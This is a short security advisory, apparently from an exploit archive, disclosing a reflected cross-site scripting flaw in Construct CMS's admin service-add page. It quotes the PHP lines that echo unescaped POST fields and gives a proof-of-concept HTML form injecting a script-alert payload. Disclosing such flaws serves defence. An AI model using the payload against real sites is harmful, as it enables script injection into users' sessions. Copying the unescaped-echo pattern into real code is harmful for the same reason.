Construct CMS - Cross-Site Scripting

2018.07.08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title : Construct CMS - Cross-Site Scripting Author : Abolfazl Hajizade Category : Webapps tested on: Windows-linux Google Dork: N/A Vulnerable page: /construct/upload/cms/admin/service-add.php Vulnerable Source: line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>" line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>" POC: <html> <body> <form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post"> <input type="text" name="name" value="<script>alert('ultrasec')</script>"/> <input type="submit" value="exploit"/> </form> </body> </html> ================================ WebSite : UltraSec.Org Channel : @UltraSecurity Email : zeroday1010@gmail.com Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top